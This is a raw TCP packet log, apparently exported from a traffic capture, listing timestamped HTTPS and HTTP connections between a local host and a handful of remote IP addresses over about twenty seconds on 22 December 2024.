                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:31.701837063 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:31.704925060 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:31.747378111 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186774969 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186839104 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186878920 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186954975 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186954975 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186990023 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.187026978 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.187047005 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.187144995 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.187818050 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.188891888 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.188916922 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.509154081 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.509243011 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.509336948 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.509582043 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.509608030 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.388446093 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.388626099 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.395425081 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.395443916 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.395812035 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.395867109 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.396446943 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.443371058 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078500986 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078579903 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078620911 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078707933 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078773022 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078829050 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.081430912 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.081459999 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.083281040 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.083388090 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.083487034 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.083664894 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.083713055 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.526060104 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.526145935 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.526524067 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.526551962 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.528146029 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.528162956 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428637981 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428719997 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428801060 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428837061 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428951979 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428951979 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.429111004 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.429140091 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.430855989 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.430891037 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.430955887 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.431134939 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.431145906 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.833894968 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.834052086 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.834368944 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.834377050 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.836051941 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.836061001 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714426994 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714504004 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714519978 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714566946 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714572906 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714616060 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714627028 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714664936 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714751005 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714801073 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714843988 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714859009 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.716149092 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.716237068 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.716326952 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.716509104 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.716537952 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.123958111 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.124150038 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.124468088 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.124494076 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.126168013 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.126182079 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.444462061 CET4972980192.168.2.4104.18.20.226
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.565016985 CET8049729104.18.20.226192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.565346003 CET4972980192.168.2.4104.18.20.226
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.986665010 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.986749887 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.986861944 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.986861944 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.986923933 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.986979008 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.987006903 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.987035036 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.987190008 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.987222910 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.987246990 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.987268925 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.988667011 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.988713026 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.988781929 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.989049911 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.989063978 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:43.401020050 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:43.401211977 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:43.401587009 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:43.401593924 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:43.403362989 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:43.403367996 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:44.274967909 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:44.275049925 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:44.275068045 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:44.275115967 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:44.275295973 CET49743443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:44.275317907 CET4434974394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:44.290570974 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:44.290607929 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:44.290676117 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:44.290860891 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:44.290872097 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.305504084 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.305541039 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.305603027 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.305784941 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.305797100 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.695311069 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.695461035 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.696244955 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.696296930 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.697777033 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.697802067 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.697858095 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:45.697880983 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.672012091 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.672106028 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.672184944 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.672224045 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.672274113 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.672274113 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.672924995 CET49744443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.672955036 CET4434974494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.702246904 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.702316046 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.702681065 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.702689886 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.704269886 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:46.704274893 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:47.739833117 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:47.739902973 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:47.739939928 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:47.739939928 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:47.740859032 CET49745443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:47.740884066 CET4434974594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.223191023 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.223249912 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.223568916 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.224077940 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.224090099 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.453107119 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.453142881 CET44349752142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.453403950 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.453658104 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.453669071 CET44349752142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.518681049 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.518764973 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.518882990 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.519296885 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.519396067 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.678116083 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.678143978 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.678205013 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.678648949 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.678658962 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:49.923675060 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:49.923934937 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:49.923963070 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:49.925656080 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:49.925734997 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:49.926712036 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:49.926842928 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:49.926847935 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:49.926987886 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:49.974112034 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:49.974119902 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.020890951 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.144067049 CET44349752142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.144298077 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.144310951 CET44349752142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.145270109 CET44349752142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.145327091 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.145654917 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.145710945 CET44349752142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.145793915 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.150809050 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.150820017 CET44349752142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.150880098 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.207923889 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.208170891 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.208254099 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.209276915 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.209366083 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.210397959 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.210486889 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.210511923 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.254870892 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.254930019 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.302828074 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.375168085 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.376171112 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.376224041 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.377676964 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.377743959 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.378062963 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.378144979 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.378192902 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.419368029 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.427684069 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.427694082 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.474553108 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.774290085 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.774347067 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.774425983 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.774446011 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.782711983 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.782766104 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.782778025 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.793334007 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.793395042 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.793553114 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.793565989 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070167065 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070209980 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070233107 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070255995 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070256948 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070276976 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070297956 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.077953100 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.078006029 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.078018904 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.090760946 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.090801954 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.090815067 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.105036974 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.105057001 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.105081081 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.105094910 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.105132103 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.218988895 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.219362974 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.219418049 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.220273972 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.220279932 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.256423950 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.260688066 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.260751963 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.260813951 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.275090933 CET44349753142.250.181.68192.168.2.4
